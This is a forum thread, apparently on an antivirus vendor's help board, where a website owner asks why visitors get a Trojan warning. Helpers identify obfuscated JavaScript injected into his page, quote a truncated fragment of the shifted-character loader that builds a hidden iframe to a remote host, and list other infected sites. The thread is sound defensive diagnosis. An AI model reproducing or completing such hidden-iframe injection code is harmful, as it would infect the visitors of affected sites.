Getting a Trojan warning from your users

Hello,

I run a website and have recently started getting emails from Avast users that this link hxxp://www.therallypoint.org/forum/trp-region-map/ is giving them a Trojan warning, but I’m not picking anything up with my software nor are many of my other technicians.

Can you please tell me if there is something with the Avast software that is causing this to over-react or is there something I should be concerned about?

Thanks,

Soda Pop

Hello Soda Pop,

Please could you modify your post to remove the active link, to avoid others potentially becoming infected?

There is a long ling of obfuscated JavaScript that is just before the closing HTML tags. This could be what avast is alerting to.
I imagine that you didn’t put it there?

-Scott-

Hi Soda Pop,

Suspicious inline script found here:

v*r k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',...

invisible or transparant,

It is from: Page 1
Home Contributed by Web Master Saturday, 12 June 2004Last Updated Saturday, 25 April 2009 PimiNet - Kosova Hackers Group Kosova Hackers Group (Edited for security reasons by Me)

_var^^
k1='......?gly#vw|oh@%ylvlelolw|=#klgghq^#srvlwlrq=#devroxwh^#ohiw=#4^#wrs=#4%A?liudph#vuf@%kwws=22',k2='0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?...........pq@^1khtcog@>1fkx@',t1=0,t2=0,h='';while(t1

Our good avast flags it as as Sign of “HTML:IFrame-EC [Trj]” has been found, and then disconnects so the user won’t get infected through malcode…
Another of these infected site is “hXtp://stricksoft.com/faq.html”
Avast free edition reports the presence of ‘HTML:IFrame-EC [Trj]’ Trojan when loading the page ‘wXw.evangelicaloutpost.com/archives/001753.html.’ The homepage elicited no such warning,

polonus